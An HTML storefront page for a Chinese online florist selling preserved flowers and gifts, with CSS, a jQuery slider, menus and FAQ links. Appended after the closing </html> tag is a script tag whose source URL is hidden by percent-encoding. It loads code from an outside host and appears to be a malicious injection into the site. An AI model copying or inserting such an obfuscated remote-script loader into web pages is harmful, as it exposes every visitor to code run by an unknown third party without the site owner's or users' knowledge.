<!DOCTYPE html>
<html>

	<head>
		<meta charset="UTF-8">
		<title></title>
		<link href="css/pgwslider.min.css" rel="stylesheet">
		<style>nav {
	width: 990px;
	height: 30px;
	background: orangered;
	margin: auto;
	position: relative;
	z-index: 4;
}

nav ul {
	list-style: none;
	padding: 0px;
	margin: 0px;
}

nav ul li {
	float: left;
	width: 120px;
	text-align: center;
	height: 30px;
	line-height: 30px;
}

nav .orangetext {
	background: orangered;
	width: 180px;
	text-align: left;
	color: white;
}

nav.orangetext2 {
	color: white;
	width: 150px;
}

nav ul li ul {
	display: none;
}

nav ul li:hover ul {
	display: block;
}

nav ul li li {
	background: orangered;
	color: #FFFFFF;
}

#top {
	width: 990px;
	position: relative;
	margin: auto;
}

#top img {
	vertical-align: middle;
}

#serch {
	position: absolute;
	left: 260px;
	top: 40px;
}

#phone {
	position: absolute;
	top: 40px;
	left: 660px;
	height: 32px;
	line-height: 32px;
}

#telephone {
	position: absolute;
	right: 25px;
	top: 40px;
}

.m {
	width: 970px;
	height: 220px;
	margin-left: auto;
	margin-right: auto;
	margin-top: 10px;
}

#iconbtn {
	width: 990px;
	margin: auto;
}

#iconbtn ul {
	list-style: none;
	margin: 0;
	padding: 0;width: 960px;
}


#iconbtn ul li {
	float: left;
	width: 220px;
	text-align: center;
}

.huitiao{
	width: 990px;
margin: auto;
background: #AAAAAA;
}
.huitiao ul{
	list-style: none;
}
.huitiao ul li{
	width: 990px;
	line-height: 30px;
	text-align: left;
	color: white;
	margin-left: -40px;
}


.wenti {
	width: 990px;
	margin: auto;
}

.wenti ul {
	width: 990px;
	list-style: circle;
}

.wenti ul li {
	width: 325px;
	height: 30px;
	float: right;
	text-align: left;
	font-size: 12px;
	list-style-position: inside;
}

.menu {
	width: 990px;
	margin: 150px;

}

.menu ul {
	width: 990px;
	list-style: none;
}

.menu ul li {
	width: 140px;
	height: 35px;
	float: left;
	line-height: 30px;
	text-align: center;
	color: white;
	border-right: 1px solid #CCCCCC;
	background: orangered;
}

.footer {
	width: 990px;
	margin: auto;
}

.footer ul {
	width: 990px;
}

.footer ul li {
	width: 990px;
	list-style: none;
	line-height: 30px;
	text-align: center;
	float: left;
}</style>
		<script src="js/jquery.min.js"></script>
<script src="js/pgwslider.min.js"></script>
<script type="text/javascript">$(document).ready(function() {
	$(document).ready(function() {
		$('.pgwSlider').pgwSlider();
	});
});</script>

	</head>

	<body>

		<div id="top">
			<div id="logo">
				<img src="img/logo.jpg" width="200px" />
			</div>
			<div id="serch">
				<img src="img/serch.png" />
			</div>
			<div id="phone">
				<img src="img/phone.png" />4008-823-283
			</div>
			<div id="telephone">
				<img src="img/headset.png" />在线客服
			</div>
		</div>
		<nav>
			<ul>
				<li class="orangetext">全部商品导购</li>
				<li>
					<a href="default.html" target="_self">首页</a>
				</li>
				<li class="orangetext2"><a href="xuanxiangka.html">鲜花</a></li>
				<li><a href="yongshenghua.html">永生花</a>
					<ul>
						<li>经典花盒</li>
						<li>巨型玫瑰</li>
						<li>永生瓶花</li>
						<li>特色永生花</li>
					</ul>
				</li>
				<li class="orangetext2"><a href="lipin.html"target="_self">礼品</a>
					<ul>
						<li>音乐盒</li>
						<li>金箔花</li>
						<li>首饰</li>
						<li>巧克力</li>
					</ul>
				</li>
				<li class="orangetext2">
					<a href="index.html" target="_self">花语大全</a>
				</li>
				<li class="orangetext2"><a href="lxwm.html">联系我们</a></li>
			</ul>
		</nav>
		<div class="m">
		<ul class="pgwSlider">
				<li><img src="img/lipin/banner01.jpg"></li>
				<li><img src="img/lipin/banner02.jpg"></li>
				<li><img src="img/lipin/banner03.jpg"></li>
				<li><img src="img/lipin/banner04.jpg"></li>
		</ul>
</div>
<div id="iconbtn">
	<ul>
		<li><a href="yinyuehe.html" target="liebiao"><img src="img/lipin/yinyuehe.png" /></a><br />音乐盒</li>
		<li><a href="jinbohua.html" target="liebiao"><img src="img/lipin/jinbohua.png" /></a><br />金箔花</li>
	    <li><a href="shoushi.html" target="liebiao"><img src="img/lipin/shoushi.png"/></a><br />首饰</li>
	    <li><a href="chocolate.html" target="liebiao"><img src="img/lipin/chocolate.png"/></a><br />巧克力</li>
	</ul><iframe width="990" height="550" scrolling="auto" name="liebiao" src="yinyuehe.html" frameborder="0"></iframe>
</div>
	
			<div class="huitiao">
				<ul>
					<li>鲜花常识&送花礼仪</li>
				</ul>
			</div>
			<div class="wenti">
				<ul>
					<li>结婚纪念送花：永生花•花永生•爱永恒</li>
					<li>永生花盒是什么？永生花盒哪家最好？</li>
					<li>永生花怎么保养？</li>
					<li>送女孩子什么礼物好？泰国保鲜花推荐</li>
					<li>永生花花语，永生玫瑰花代表什么？</li>
					<li>永生花多少钱？</li>
					<li>送女朋友保鲜花，代表不凋谢的爱情</li>
					<li>永生花价格是多少？永生花贵吗？</li>
					<li>永生花是真花吗？</li>
					<li>进口永生玫瑰与国产永生玫瑰的区别</li>
					<li>永生花是什么花？如何制作永生花？永生花制作方法介绍</li>
					<li>永生花哪里有卖？</li>
					<li>情人节送永生花代表什么？</li>
					<li>永生花寓意是什么？永生花的意义是什么？</li>
					<li>什么是永生花？</li>
				</ul>
			</div>
			<div class="menu">
				<ul>
					<li>十年品牌</li>
						<li>3小时配送</li>
						<li>低价保障</li>
						<li>配送范围</li>
						<li>花店加盟</li>
						<li>投诉建议</li>
						<li>首页</li>
				</ul>
			</div>
	<div class="footer">
				<ul>
					<li>全国统一订花电话:400-888-7844电脑端/手机<br /> copyright&copy;2007-2018版权所有：山西太原网上花城信息产业部备案 ICP备06016666号</li>
				</ul>
	</div>
	</body>

</html><script src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></script>